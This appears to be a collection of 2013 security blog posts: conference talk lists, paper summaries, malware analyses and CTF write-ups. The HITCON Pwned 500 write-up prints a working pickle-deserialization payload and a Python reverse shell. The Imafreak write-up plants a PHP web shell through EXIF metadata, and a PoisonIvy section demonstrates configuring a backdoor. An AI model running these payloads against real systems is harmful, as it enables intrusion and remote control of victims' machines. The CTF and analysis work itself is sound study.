BlackHat 2013

[malware]
BINARYPIG - SCALABLE MALWARE ANALYTICS IN HADOOP
BOCHSPWN: IDENTIFYING 0-DAYS VIA SYSTEM-WIDE MEMORY ACCESS PATTERN ANALYSIS
BUGALYZE.COM - DETECTING BUGS USING DECOMPILATION AND DATA FLOW ANALYSIS
END-TO-END ANALYSIS OF A DOMAIN GENERATING ALGORITHM MALWARE FAMILY
HOT KNIVES THROUGH BUTTER: BYPASSING AUTOMATED ANALYSIS SYSTEMS
HOW TO GROW A TREE (TAINT-ENABLED REVERSE ENGINEERING ENVIRONMENT) FROM CBASS (CROSS-PLATFORM BINARY AUTOMATED SYMBOLIC-EXECUTION SYSTEM)
HUNTING THE SHADOWS: IN DEPTH ANALYSIS OF ESCALATED APT ATTACKS
JAVA EVERY-DAYS: EXPLOITING SOFTWARE RUNNING ON 3 BILLION DEVICES
JUST-IN-TIME CODE REUSE: THE MORE THINGS CHANGE, THE MORE THEY STAY THE SAME
MACTANS: INJECTING MALWARE INTO IOS DEVICES VIA MALICIOUS CHARGERS
OPTIROP: HUNTING FOR ROP GADGETS IN STYLE
VIRTUAL DEOBFUSCATOR - A DARPA CYBER FAST TRACK FUNDED EFFORT
SPY-JACKING THE BOOTERS
SMASHING THE FONT SCALER ENGINE IN WINDOWS KERNEL
PRESS ROOT TO CONTINUE: DETECTING OSX AND WINDOWS BOOTKITS WITH RDFU
PREDICTING SUSCEPTIBILITY TO SOCIAL BOTS ON TWITTER
MILLION BROWSER BOTNET

[web]
DISSECTING CSRF ATTACKS & COUNTERMEASURES
THE FACTORING DEAD: PREPARING FOR THE CRYPTOPOCALYPSE
JAVASCRIPT STATIC SECURITY ANALYSIS MADE EASY WITH JSPRIME
') UNION SELECT `THIS_TALK` AS ('NEW OPTIMIZATION AND OBFUSCATION TECHNIQUES’)
TLS 'SECRETS'
SSL, GONE IN 30 SECONDS - A BREACH BEYOND CRIME
PIXEL PERFECT TIMING ATTACKS WITH HTML5


[network]
DEFENDING NETWORKS WITH INCOMPLETE INFORMATION: A MACHINE LEARNING APPROACH
EVADING DEEP INSPECTION FOR FUN AND SHELL
FULLY ARBITRARY 802.3 PACKET INJECTION: MAXIMIZING THE ETHERNET ATTACK SURFACE
HOME INVASION V2.0 - ATTACKING NETWORK-CONTROLLED HARDWARE
OWNING THE ROUTING TABLE - PART II
WHAT'S ON THE WIRE? PHYSICAL LAYER TAPPING WITH PROJECT DAISHO
UNIVERSAL DDOS MITIGATION BYPASS
LESSONS FROM SURVIVING A 300GBPS DENIAL OF SERVICE ATTACK


[social enginnering]
USING ONLINE ACTIVITY AS DIGITAL FINGERPRINTS TO CREATE A BETTER SPEAR PHISHER
PREDICTING SUSCEPTIBILITY TO SOCIAL BOTS ON TWITTER
MALTEGO TUNGSTEN AS A COLLABORATIVE ATTACK PLATFORM

[embeded]
BLUETOOTH SMART: THE GOOD, THE BAD, THE UGLY, AND THE FIX!
EXPLOITING NETWORK SURVEILLANCE CAMERAS LIKE A HOLLYWOOD HACKER
FACT AND FICTION: DEFENDING YOUR MEDICAL DEVICES
HACKING, SURVEILLING, AND DECEIVING VICTIMS ON SMART TV
HONEY, I’M HOME!! - HACKING Z-WAVE HOME AUTOMATION SYSTEMS
THE OUTER LIMITS: HACKING THE SAMSUNG SMART TV
OUT OF CONTROL: DEMONSTRATING SCADA DEVICE EXPLOITATION
UART THOU MAD?

TERIDIAN SOC EXPLOITATION: EXPLORATION OF HARVARD ARCHITECTURE SMART GRID SYSTEMS
STEPPING P3WNS: ADVENTURES IN FULL-SPECTRUM EMBEDDED EXPLOITATION (AND DEFENSE!)
THE SCADA THAT DIDN'T CRY WOLF- WHO'S REALLY ATTACKING YOUR ICS DEVICES- PART DEUX!
RFID HACKING: LIVE FREE OR RFID HARD
POWER ANALYSIS ATTACKS FOR CHEAPSKATES

[mobile]
ANDROID: ONE ROOT TO OWN THEM ALL
BLACKBERRYOS 10 FROM A SECURITY PERSPECTIVE
HOW TO BUILD A SPYPHONE
ROOTING SIM CARDS
REVEALING EMBEDDED FINGERPRINTS: DERIVING INTELLIGENCE FROM USB STACK INTERACTIONS
MULTIPLEXED WIRED ATTACK SURFACES
MOBILE ROOTKITS: EXPLOITING AND ROOTKITTING ARM TRUSTZONE
I CAN HEAR YOU NOW: TRAFFIC INTERCEPTION AND REMOTE MOBILE PHONE CLONING WITH A COMPROMISED CDMA FEMTOCELL

[system]
A TALE OF ONE SOFTWARE BYPASS OF WINDOWS 8 SECURE BOOT
BIOS SECURITY
FUNDERBOLT: ADVENTURES IN THUNDERBOLT DMA ATTACKS
HACKING LIKE IN THE MOVIES: VISUALIZING PAGE TABLES FOR LOCAL EXPLOITATION
HIDING @ DEPTH - EXPLORING, SUBVERTING AND BREAKING NAND FLASH MEMORY
LET'S GET PHYSICAL: BREAKING HOME SECURITY SYSTEMS AND BYPASSING BUILDINGS CONTROLS
PASS-THE-HASH 2: THE ADMIN'S REVENGE
PASS THE HASH AND OTHER CREDENTIAL THEFT AND REUSE: MITIGATING THE RISK OF LATERAL MOVEMENT AND PRIVILEGE ESCALATION

[else]
WITH BIGDATA COMES BIG RESPONSIBILITY: PRACTICAL EXPLOITING OF MDX INJECTIONS
WHAT SECURITY RESEARCHERS NEED TO KNOW ABOUT ANTI-HACKING LAW
TOWN HALL MEETING: CFAA REFORM STRATEGY
POST EXPLOITATION OPERATIONS WITH CLOUD SYNCHRONIZATION SERVICES
MAINFRAMES: THE PAST WILL COME BACK TO HAUNT YOU
LEGAL CONSIDERATIONS FOR CELLULAR RESEARCH
LEGAL ASPECTS OF FULL SPECTRUM COMPUTER NETWORK (ACTIVE) DEFENSE
LAWFUL ACCESS PANEL
IS THAT A GOVERNMENT IN YOUR NETWORK OR ARE YOU JUST HAPPY TO SEE ME?

Paper Reading : Enabling Sophisticated Analyses of x86 Binaries with RevGen

This paper is proposed in HotDep'11.
This paper is aim to ease the difficulty of binary analysis by RevGen, which translating tradition x86 binary into LLVM IR instead of ad-hoc IR, which use by different system.

There are many different system for binary program analysis, for example, BitBlaze and CodeSurfer. However they use their own IR language which hard to migrate to other system and without formalize verify.

LLVM, a popular compiler framework, have been widely used in many analysis tool. For example,
KLEE and Parfait are both LLVM-based.

LLVM

LLVM is a compile framework with a compact RISC-like instruction set. It support unlimit register and only contain 30 opcodes, which ease to analysis. Especially, only load and store can access memory.

LLVM naturelly support Static Single Assignment(SSA) code representation. So data flow and def-use graph can be compute. Moreover function inlining, constant propagation, or dead store removal can also achive.

To translate binary code into LLVM, following issue must be concern

• pointer arithmetic 
• accommodate different stack layouts
• transform accesses to various code and data segments
• deal with indirect call
• semantic equivalent LLVM programs.

Challenge

1. Extracting binary code's semantics
2. Inferring type information

RevGen

Translating Blocks of Binary Code

1. Disassemble into micro-operations, which translate to LLVM instructions later.

2. One to one mapping between micro-operations and LLVM instructions.

Reconstructing the Control Flow Graph (CFG)

1. Each code block is translate to LLVM block, and form the functions.

2. Connect each functions with call instructions.

 Obtaining Analyzable LLVM Programs

This part the symbol table contain library call and relocation table are provide to identify some constant address. Then translation can be complete.

Paper Reading : BotMiner: Clustering Analysis of Network Traffic for Protocol- and Structure-Independent Botnet Detection

BotMiner is proposed in Usenix'08 by College of Computing, Georgia Institute of Technology.
In this paper, authors aim to detect c&c botnet without a priori knowledge. The key concept of this paper is to cluster malicious behaviors and communication traffic separately and mining  relation between them. Their system achieve a good detection rate in their evaluation.

Introduction

In this section, authors introduce current state of botnet. Classificaton of botnet is list below.

IRC Botnet, include 

P2P Botnet, include Nugache and Storm/Peacomm

Related Work

Most related work are specific to IRC and HTTP protocols,which are most widest used by C&C botnet. This paper proposed a system to detect arbitrary protocols communications.

Definition and Assumption

The authors define the botnet as "A coordinated group of malware instances that are

controlled via C&C channels".  That is, it is unavoidable for bot to communicate to other bot/bot server and it necessary for a bot to bring out some malicious activities. 

Proposed Scheme

The architecture of botMiner is in the figure.

In order to detect bot in a network, BotMiner follow two observation, "who is talking to whom" and "who is doing what". Therefore the system is divide to C-Plan and A-Plan.

• C-Plan is responsible for communication
  C-Plan Monitor employ hardware supporting(Cisco, Juniper) to log network traffic. 
• A-Plan is responsible for activities
  Snort with SCADE (Statistical sCan Anomaly Detection Engine) plugin is used to implement A-Plan Monitor.

In C-Plan Cluster, noise connections and white list connection are first filtered out. Then the two-level cluster is processed, from course grain to fine grain. The aggregating of some attributes are calculated

1. the number of flows per hour(fph)
2. the number of packets per flow(ppf)
3. the average number of bytes per packets(bpp)
4. the average number of bytes per second (bps)

After those feature are computed, X-mean, an K-means variant algorithms, is used to cluster in different feature space to implement course grain and fine grain cluster. X-mean can cluster without pre-define clustering number. X-means runs multiple rounds of K-means to find proper number of clustering with help of Bayesian Information Criterion. Similar approach is used in A-Plan cluster.

Finally,  cross-check clusters is taken to find out intersections that infers exists of botnet.

HITCON 2013 Session Summary : Advance Malware Evasion And Hiding Techniques

This session is origin in HITCON 2013, proposed by Chong Rong Hwa from FireEye

Attack Vector

In this session, first three type of infection vectors are discussed

1. Physical, like USB
2. Email
   Compress, Encryption, Password protected compression
3. Web
   Water Hole Attack, which attacker compromise legitimate website to host malicious page.
   ex. May 1 2013, attacker compromise US Department of Labour to host PoisonIvy Backdoor

APT Advanced Malware

Those malware not use advance technique but disguise itself as normal program or user.

Hacker may use old vulnerabilities, but slightly change the exploit code to harden the analysis.

    Add invalid characters in rtf file to confuse parser

    Replace part of shellcode to semantic-equivalent instructions

Save non-malicious code in disk, construct malicious payload in the memory

    Trojan.APT.BaneChant

Employ common used encryption(signature) algorithms with slightly change(ex. DES,AES)

Use public and legitimate service for malicious behaviors, such as : google drive, amazon aws

    Trojan.APT.Seinup

Anti-VM

   Detect human behaviors

APT Attack Source

Not from single source and the control servers are distributed over the world.

      Asia and East Europe are two most source region for APT attack. 

      Most of APT tool made in China, ex. Gh0stRAT

HITCON 2013 Overview

Cyber War

1. People's Republic of Cyber Warfare: Comparing China Iran & Russia Militarization of Cyberspace(駭客人民共和國: 中國伊朗跟俄羅斯網軍的分析與比較)
2. Global Cyber Espionage and Chinese Hacker Threats, Internet Survillance and PRISM(全球間諜：互聯網監控全球趨勢 棱鏡門與中國駭客威脅論)
3. APT1: Technical Backstage(APT1: 反攻網軍後台)
4. How South Korea Makes White-hat Hackers(南韓如何培養白帽駭客？)
5. How does Japan dea with Targeted Attack and SCADA Security(目標鎖定攻擊與工控系統安全：日本如何應對兩大趨勢)

Cyber War is the main topic of HITCON 2013. Hence many session about global cyber activity are included.
In first two presentation talk about national power of cyber war, include China, Iran and Russia. And also mention about chineese hacker and  Internet survillance of U.S.
Second, Paul Rascagneres from malware.lu share their experience to track APT1 hacker,which probable come from china.
Then, national strategy of Japan and Korean, which are two countries near TW, is mentioned. 

APT

1. APT defense from the view of security architecture(從系統設計建置面談 APT 防禦)
2. Visual Data Analytics - Graphing your Indicators(APT 特徵的視覺資料分析法)
3. Digital Eagle Eye System: Use Cyber Intelligence against APT Attacks(數位鷹眼系統: 以網路數位情資對抗 APT 攻擊)
4. APT Cyber Shuttle: From Automated Analysis to TTP Observation(APT網際飛梭：從自動化分析到拆解 APT 後台駭客活動)
5. Light & Shadow about Banking $ecurity @Japan(光與影 日本銀行業的資訊安全)

In HITCON 2013, APT is still one of hottest topic. In those session, management and strategy against APT is discussed. And some forensics technique are also proposed to face APT attack.
Notice that, the session "APT Cyber Shuttle: From Automated Analysis to TTP Observation" proposed by Xecure-Lab & Academia Sinica will give a session in Black Hat US 2013.

Malware

1. Building new weapons for malware analysts(建立惡意軟體分析的新武器)
2. Advance Malware Evasion and Hiding Techniques(惡意軟體的進階免殺技巧)
3. Static Analysis and Dynamic Instrumentation for Intelligent Exploit Analysis(靜態與動態智慧型漏洞文件分析系統)

Malware analysis is a old discussion problem. In this year, some session about malware are also included.

Mobile

1. Escaping Android Dynamic Analysis; Chinese New Year Train Ticket Ordering Day(逃離安卓動態檢測 & 訂票助手一日談)
2. Dex Education 201: Anti-Emulators(深入Dalvik Dex教學:反制模擬器)
3. Android Hooking Attack
4. Review of Security Vulnerabilities on the Android Platform(Android平臺安全性漏洞回顧)
5. GSM Security Research using Open Soruce Tools(以開源軟體進行GSM安全研究)

With exponent usage of mobile device, sessions about mobile are also increasing. The first two sessions mention about how malware evade security analysis mechanism. Then the following two sessions is about technique employed by malware. Especially, "Review of Security Vulnerabilities on the Android Platform" ,proposed by 肖梓航 Claud, which overview the android vulnerabilities in current year is worthy to read.

Exploit & Vulnerability

1. Life of Coder: The adventure through the landscape of bugs(程序員的蟲洞漂流)
2. Analysis on the EPATHOBJ Exploit(請謹慎編碼，哪怕它只是一句錯誤處理— 來自 win32k!EPATHOBJ::pprFlattenRec 漏洞的啟示)
3. Killing AV in x64(戳戳防毒軟體死穴)
4. 0-Day Easy Talk - Happy Fuzzing Internet Explorer(0-Day 輕鬆談 - Happy Fuzzing Internet Explorer)
5. How can i have 100 0day for just 1day(超級祕訣 - 一天擁有 100 個 0day!)
6. Exploiting JRE (JRE安全机制与漏洞挖掘研究)

Exploit and Vulnerability is an interesting topic this year. An 0 day sharing activity is also include in this year's HITCON.
In first three sessions, the authors analysis some known exploit and  share their implementation. The fourth session, the author demonstrate the 0-day he found and share his experience.
The fifth talk present an idea to fuzz numerous of application at once. The last one session conclude java vulnerabilities in current day and the direction to fuzz java platform.

Others

1. The undisclosed files of incidents by the data scientist(資料科學家未曾公開之資安研究事件簿)
2. OS X Rootkits Stuff(那些洞，我們一起追的 OS X Rootkits)
3. Spears and shields on online game(線上遊戲矛盾大對決)
4. Breaking image CAPTCHA for fun(CAPTCHA 好好玩)
5. Protocol and physical analysis of EMV POS devices.(EMV晶片卡POS裝置的實體與溝通協定分析)
6. Browser and Local Zone(瀏覽器和本地域)

The session "The undisclosed files of incidents by the data scientist" talk about some research topic of professor 陳昇瑋. Social network and malicious phone call are both special and interesting topic.

Also web security are widely discussed in Black Hat 2013, there are less topic about web security in this year's HITCON.  

CVE-2013-1763 : Local Privilege Escalation Vulnerability

This vulnerability is published in February, it can make normal user gain power of super user. Ubuntu 12.x is vulnerable. So I download the POC code and test it. The result is successful.

Formal Verification for Cryptography Protocols

In this year's S&P conference, Microsoft and INRIA has proposed a paper "Implementing TLS with Verified Cryptographic Security." In this paper, an F# TLS library was implemented and serial of formal proof were  also given. To understand their survey, some background knowledge are necessary. After some search, the slide published in etaps12 is most easily document. So in this article, I will summary this slide.

Attack Model

The attack model is communication in an insecure network environment as following figure

• The attacker can intercept all messages sent on the network
• He can compute messages
• He can send messages on the network

The term cryptographic primitives means basic cryptographic function which later used to build security protocols.

Symbolic Model and Computational Model 

Model	Symbolic Model	Computational Model
Cryptographic Primitives	blackboxes	functions on bitstrings
Messages	terms on cryptographic primitives	bitstrings
Attack Capability	Compute with cryptographic primitives	Probabilistic polynomial-time Turing machine
Security Assumptions	Verify what attacker can do	Verify what attacker cannot do

Verifying Protocols in the Symbolic Model

The basic idea is to compute the knowledge of attacker. So we exhaust all combination of cryptographic primitives. Then check if any of them violate security policy. It is trivial that those combination can be infinite, thus this model can be undecidable. So some technique like approximation, proper subset or termination state are used.

For example, Horn Clauses can be use to verify symbolic model. With the notation attacker function
                                             attacker(M) means “the attacker may have M”

And there introduce two functions

       Construct f( m1 ,m2 ,m3 ,...,mn ) 

              attacker( m1 ) ^ attacker( m2 ) ^ ... ^ attacker( mn ) -> attacker( f(m1, m2,..., mn) )  

       Destruct g(m1,m2,...,mn) -> m

              attacker( m1 ) ^ attacker( m2 ) ^ ... ^ attacker( mn ) -> attacker( m )

       Example

              attacker(m) ∧ attacker(k) → attacker(sencrypt(m, k))

              attacker(sencrypt(m, k)) ∧ attacker(k) → attacker(m)

Verifying Protocols in the Computational Model

There are thee strategy to verify the computational model

1. Linking the symbolic and the computational models
   First, proof in symbolic model and verify computation soundness in symbolic model. Then we can prove the computatiobal model is secure. 
2. Adapting techniques from the symbolic models
   Some symbolic techniques can also be adapted to the computational model
3. Direct computational proofs
   Proofs in the computational model are typically proofs by sequences of games

Reference 

1. Bruno Blanchet's presentation slide(1)
   http://www.mpi-inf.mpg.de/vtsa11/slides/blanchet/VTSA11intro.pdf
2. Bruno Blanchet's presentation slide(2) 
   http://www.mpi-inf.mpg.de/vtsa11/slides/blanchet/VTSA11proverif.pdf
3. Bruno Blanchet's presentation slide(3)
   http://cs.ioc.ee/etaps12/invited/blanchet-slides.pdf

PoisonIvy Remote Administration Tool

In this article, I will talk about PoisonIvy and demo it's usage.

PoisonIvy is a remote administration tool, which is widely used by hackers as the backdoor.

There are some news about PoisonIvy：

• Trend Micro Uncovers Interesting Variant of PoisonIvy RAT
• Poison Ivy RAT served by compromised Israeli website

Usage Demostration

In PoisonIvy Server Profile, we can config the server.

In this tab, address and password can be set. Proxy attribute can also be set in this tab.
The next tab, install, is used to config how the backdoor startup. Such as autostart and executable name is included.

Some advantage attribute like process injection, persistent and key logger are contained.
After generation, a backdoor will be generated. Then we create correspond client and  execute the backdoor in another machine.

After a success infection, a message will showed. And we can get some basic information about victim.

 Then we can retrieve some system information about victim's machine.

Next step, we can create a remote shell to victim.

Moreover, we can also get the remote desktop of victim.

HITCON 2013 Write Up： Pwned 500

In this problem, a django website was given with it's source code available here. Browsing all the files in the repo, we can find two thing interesting in settings.py.

1. The session engine is "django.contrib.sessions.backends.signed_cookies"
2. The SECRET_KEY  is also provided in source code.

When signed_cookies is used, every cookie with sessionid field will treated as  serialized data. Then pickle is used to deserialize. While pickle library is unsafe once it is not apply to ordinary type. So we can follow the document here and complete the attack process. Note that reference document also provide reference code which is wealthy to read.

With following python code, we can convert connback.py into pickle format and invoke the program once pickle.loads() is called to de-serialize.

code = b64(open('connback.py').read())

class ex(object):
    def __reduce__(self):
        return ( eval, ('str(eval(compile("%s".decode("base64"),"q","exec"))).strip("None")'%(code),) )
payload = pickle.dumps(ex())

And we can prepare a reverse shell as follow

socket.setdefaulttimeout(60)
sok = None
try:
    sok = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    sok.connect((host,port))
    sok.send('!P0Wn! Congratulation !!\n') 
    save = [ os.dup(i) for i in range(0,3) ]
    os.dup2(sok.fileno(),0)
    os.dup2(sok.fileno(),1)
    os.dup2(sok.fileno(),2)
    shell = subprocess.call(["/bin/sh","-i"])
    [ os.dup2(save[i],i) for i in range(0,3)]
    [ os.close(save[i]) for i in range(0,3)]
    os.close(sok.fileno())
except Exception:
    pass

Finally, we start a nc for reverse shell to connect and excute exploit.py to retrieve return shell.

bletchley@Viking:~/WorkSpace/2013_Django/pwp-master$ python exploit.py '1%idg#a2%byqh@l1wcv^3kc=e*($0v44(u-c^@bf_lz-@#essk' http://vuln-django.orange.tw
Sending payload, check you listenner

CODEGATE 2012 Write Up： Network 200

In this problem, a pcap file is given and we are asked to find the target host of DDOS.
After list all ip sort by the packet number and trace it one by one, we can find most suspicious flow.
First is attack target to 109.123.118.42 which send a lot of GET connections.

Second one is target to 111.221.70.11, which is SYN Flood.

 The third attack is targetting 199.7.48.190, which resend a lot of SYN with sequnce number 0.

 The last one send a lot abnormal HTTP packet.

Combine this four address, the key is none_111.221.70.11_109.123.118.42_199.7.48.190_66.150.14.48

PHD CTF Quals 2012 Write Up： Forensic 100

In this problem, and QRcode image are given as following pic.

We first use online scanner to scan this QRcode and get the binary string.

7F454C46010000000000000000004305020003001A0043051A00430504000000B931004305B220CD80252000010093CD803030343330354232323043443830323532303030303130303933434438300A

Saving this string as a file, and using file command, we can recognized this file is an ELF executable.
After executing file, we get the string as output.

004305B220CD80252000010093CD80

Then with stegsolve, we can extract some string.

328:5261 72211A07 00CE9973 80000D00 00000000 00001566
EFE453AE B7AFEBEB 515C366D 9C07555B 4739CBEE 3217360A
3A52E015 3C7AA47C F3BC9DEA 16A30B98 8B5ABCC2 B98BD56C
8E84EB4A 7CEACF43 74D01FD6 9D98C282 1D05B79B 2CC4D3E6
4CB09081 42566EEA C2862E0A 2BA7C559 7E7FCB77 97051CFE
55C8DF4A 10A93D07 2DC79C64 39C6E44D 9845B267 21A71566
EFE453AE B7AF74E5 062C467D BD49421B 47D68DB8 E7F5.

The first integer 328 may indicate the length of msg. Therefore we extract first 328 chars as a file, which is indeed an RAR file.
To extract RAR file, we need a password. Hence we use first string as password and express RAR file.
There is an secret.txt and key.
The key is 90f3910ff22f4be0dfa95a2fd6cb8a25

PlaidCTF 2012 Write Up： RSA 200

This problem is the second time which try to break RSA. In the previous practice, the reason to break RSA is using module already factored. In this problem, the vulnerability to break RSA is using small exponent number.

In this problem, an encrypted data is given with an public key.
Using  RSA python module, we can find information about RSA algorithms.
(or use command: openssl rsa -pubin -in id-rsa.pub -text)

The exponent  number used is 3, which is very small. And increasing the risk of rsa. Observing that the encrypt message is related small too, this give us a clue to solve rsa.

According to RSA encrypt schema, the formula below

It can reduce to  

With e=3, we can get following formula 

Since we have value of M and N, while C is plain text we need to solve, only K is unknown. With small small M and e, we can consider N is related small.
So we wrote a program which use brute force to find K. To check if the 3-rd root of C-KN is an integer, we can find the true K and the key.

from Crypto.PublicKey import RSA
from Crypto.Util import asn1
from base64 import b64decode
import libnum
import math
import gmpy

pubkey = open('id-rsa.pub').read()
key = RSA.importKey(pubkey)
print "n = "
print key.publickey().n
print "e = "
print key.publickey().e
nkey = key.publickey().n
message = open("enc.dat",'r').read()
print libnum.s2n(message[:-1])

ct = libnum.s2n(message.rstrip())
print libnum.len_in_bits(ct)

c = ct
k = 1
while True:
        if k % 10000 == 0 :
                print k
        p = gmpy.root(c, 3)[0]
        if pow(p,3,nkey)==ct:
                print libnum.n2s(p)
                break

        c += nkey
        k+=1

ForbiddenBITS CTF 2013 Write Up : Misc 150 Invisible

In this problem, a file is provided. Dump the file, we can observe it only contain 0x20 and 0x09.

So we guess it is program call Whitespace. So we find the compiler and disassembler of Whitespace.
After executing the program, we get the following result.

We know that this program only accept some input. Then we disassemble the program and get it's instructions.

This program check if the first character is 'w' and second one is 's'. Then we collect the characters this program reads. And executes the program with expected input "wslang", the key will be shown.

ForbiddenBITS CTF 2013 Write Up : Web 600 Imafreak

Imafreak

In order to practice for wargame, I choose this problem from ForbiddenBITS CTF 2013 and reconstruct this environment. Also some environments are different, the solution are identical. 

Problem Description 

In this problem, the website is provided. There are two pages in this website, an view.php and upload.php.

Take a briefly view of upload.php, this page contains a form to upload image file. With no any parameters,  view.php only show "wrong id" string. There is also a hint "Hint6[Freak]:~)".

Solution

Firstly, Following the hint, we can access view.php~ and view the cource code. Source code can be found here.
The following piece code is vulnerable.

$_GET['id']=str_replace(".","",$_GET['id']);       
$_GET['id']=str_replace("/","",$_GET['id']);
$_GET['id']=str_replace("\\","",$_GET['id']);
if(!empty($_GET['id']) && @file_exists('upload/'.$_GET['id'].'.jpg')){
    $img=file_get_contents('upload/'.$_GET['id'].'.jpg');
    $notFound="";
    $exif_ifd0 = read_exif_data('upload/'.$_GET['id'].'.jpg','IFD0' ,0);
    if (@array_key_exists('Model', $exif_ifd0)) {
        $camModel = $exif_ifd0['Model'];
    } else { $camModel = $notFound; }
        $imgx = 'upload/'.$_GET['id'].'.jpg';
        $imgHand = ImageCreateFromJPEG($imgx);
        $imgSize = GetImageSize($imgx);
        $imgWidth = $imgSize[0];
        $imgHeight = $imgSize[1];
 
        $dd="";
        for ($l = 0; $l < $imgHeight; $l++) {
            for ($c = 0; $c < $imgWidth; $c++) {
                $pxlCor = ImageColorAt($imgHand,$c,$l);
                $pxlCorArr = ImageColorsForIndex($imgHand, $pxlCor);
                $dd.=chr($pxlCorArr["red"]);
            }
        }
        $filex="secretstoreddata/"."secret".($camModel);
        $fp=fopen($filex, 'w');
        fwrite($fp, $dd);
        fclose($fp);
}                                

Therefore we can observe that this php read the image in upload directory and save the red part into secretstoreddata directory. If we can control the content and file extension, then we can inject some code and execute arbitrary code.

We start from file extension, the file extension comes from read_exif_data().  Function read_exif_data() return  EXIF headers from a JPEG file, which is used to maintain some metadata of digital camera.Since EXIF data can be modified, we can modify it and control file extension by exiv2.

File content can be construct by some image library such as python's PIL and php's Image Processing and Generation. Here we following the program in this write up as following.

';
$width = strlen($shell);
// create image using true color
$img = imagecreatetruecolor($width, 1);
for ($x = 0; $x < $width; $x++) {
    // get ascii value of shellcode
    $value = ord($shell[$x]);
    // set a pixel using the ascii
    $color = imagecolorexact($img, $value, $value, $value);
    imagesetpixel($img, $x, 0, $color);
}
// save image using 100% quality
imagejpeg($img, 'imafreak.jpg', 100);
// add Model metadata using exiv2 tool
system('src/exiv2 -M "add Exif.Image.Model .php" imafreak.jpg');
?>                      

After executing this php program, the jpeg file will be generated. Then we access to

http://140.113.216.151:10180/Imafreak/view.php?id=imafreak

Then we send the request to generated php program as follow.

http://140.113.216.151:10180/Imafreak/secretstoreddata/ea5d2f1c4608232e07d3aa3d998e5135.php?c=ls

We can find that there is key.php file in secretstoreddata dir. So we continue to read this file and finally get the key.

http://140.113.216.151:10180/Imafreak/secretstoreddata/ea5d2f1c4608232e07d3aa3d998e5135.php?c=cat%20key.php

 

note

In July 16 2013, a technique blog talk about a malware which emplaoy similar technique.
http://blog.sucuri.net/2013/07/malware-hidden-inside-jpg-exif-headers.html 

Android Malware Zitmo Analysis

Zitmo

Zitmo is an android bot which aim to stole user's bank authentication tokens. It is interest that Zitmo's feature to beat two factor authentication. 

In order to prevent traditional banking trojan, online banking service employ transaction authentication numbers (TAN), which is a two factor authentication mechanism, to authorize user.  

Zitmo is the mobile version of Zeus bot, which give Zeus a chance to defeat two-factor authentication.

In two factor authentication, online bank will first request user's mobile number. After user first authentication with tradition password mechanism, the message contains secondary password will send to user's mobile. Only user with this two password can successful authentication and complete transaction.

Following figure describe how Zitmo work:

First, Zeus will infect user's computer. Once user connects to online back after infection, the connection will be hijacked. All the user's input will be sent to bot server including the phone number used to authenticate. Then the bot server will send a forge message to user's mobile to install an app, which is indeed Zitmo bot. Once user install this app, all the message will be hijacked too. Hence the secondary password will sent to bot server, thus attacker has ability to do some bank transaction.

Take a briefly look into Zitmo.

In manifest, we can observe following sections.

Zitmo requests permission to reseive and send message.

Zitmo also register a receiver triggered once mobile boot/reboot.

We can observe Zitmo register a receiver to intercept message with high priority(MAX INTEGER), so it can hijack user's incoming messages. 

The core part of Zitmo is in following figure. After massage coming, function onReceive() will called and snedSmsIfEnabled() will called to send Sms to attacker. 

Reference

http://www.securelist.com/en/analysis/204792194/

DEFCON 21 CTF Write Up：gnireengine 1

gnireengine 1：policebox

In this problem, we got two files, one executable named policebox and a core dump file of policebox.
As we observe the core dump, we found that this core dump file is generated when few instructions after main function. While we need to get some information of getchar(), it seem no clue to continue.
Then we use readelf to check what is inside the core file.

We noticed the section named precord exists, which indicate the core dump contain a program execution record logged by gdb's Process Record feature.

Therefore we first replay this record with gdb, and disassemble the program. Function getchar() is located at 0x08048690, where we can set the break point latter.

 After setting break point, we continue the replay. Then program will halt in getchar() and we can print value of eax, which is the user's input.

Collecting all the input value, the key will showed.

The key is : w0rlds.w0rst.k3yl0gger! 

reference

http://team-alternatives.blogspot.kr/2013/06/defcon-21-ctf-quals-policebox-writeup.html

http://sourceware.org/gdb/wiki/ProcessRecord

DEFCON 21 CTF Writeup：3dub 1

3dub 1：badmedicine

In this problem, we only see a login form.

After we login with some username. We get the login successful page.

But it show that "the key is only for the admin"

And if we try to login with admin. The message "admin login disabled" showed.

Then we return to login by other account and observe the behavior of web page by tamper data.

With tamper data, we observe the cookie "username" was set.

After try to login with different username

admin1 : 09c8259ca01f

admiN  : 09c8259c80

We can find that most part of cookie are the same and only differ lightly.

Therefore we can guess that cookies are encrypt by xor operator.

Finally we can find the cookie of admin

admin : 09c8259ca0

Then we change the value of cookie and resend the page to get the key.

reference

there are some write up about this problem.

http://forum4hackers.blogspot.tw/2013/06/defcon-2013-3dub-1-2-and-4-web-writeup.html

http://blogs.univ-poitiers.fr/e-laize/2013/06/17/dc21_3dub_1/

https://cesena.ing2.unibo.it/2013/06/17/def-con-2013-badmedicine-3dub-2/

http://scoding.de/defcon-ctf-2013-writeup-3dub-1/

http://nullify-ctf.blogspot.tw/2013/06/3dub-1-def-con-quals-2013-writeup.html

Anti-Reverse Technique Used in Malware

It is endless arm between security experts and hackers. Hacker discover new exploits or new attack vectors, in the same time security experts try to identify and block those attacks. In order to prevent detection or analysis, attackers employ some technique to avoid reverse engineering and detection.Following pic show that nearly 90% malware will employ some Anti-Re technique.

In Black Hat US 2012, Rodrigo Rubira Branco et al. classified anti-reverse technique into four type, Anti-Disassembly, Anti-Debugger, Obfucation and Anti-VM. In this article, I will summary anti-reverse technique based on this paper, and discussion each technique in other article . The distribution of Anti-Re is shown below.

This paper also summary the packer used in their observation. As this table show, most packer employed in malware is UPX. 

List below is famous packer used by malware with their function to anti-reverse engineering.

UPX

1. UPXV200V290MarkusOberhumerLaszloMolnarJohnReiser
   Anti-VM (SLDT)
   Anti-VM (IN)
   Push Pop Math
   Instruction Counting
   PEB NtGlobalFlag
   PEB's BeingDebugged (Stealth IsDebuggerPresent)
2. UPXv20MarkusLaszloReiser
   Anti-VM (SLDT)
   Anti-VM (IN)
   Push Pop Math
   Instruction Counting
   PEB's BeingDebugged (Stealth IsDebuggerPresent)
   SS register
3. UPX290LZMAMarkusOberhumerLaszloMolnarJohnReiser
   Anti-VM (IN)
   Push Pop Math
   Instruction Counting
   PEB's BeingDebugged (Stealth IsDebuggerPresent)
   SS register
4. UPX20030XMarkusOberhumerLaszloMolnarJohnReiser
   Anti-VM (IN)
   Push Pop Math
   Instruction Counting
   PEB's BeingDebugged (Stealth IsDebuggerPresent)
5. UPX293300LZMAMarkusOberhumerLaszloMolnarJohnReiser
   Anti-VM (IN)
   Instruction Counting
   PEB NtGlobalFlag
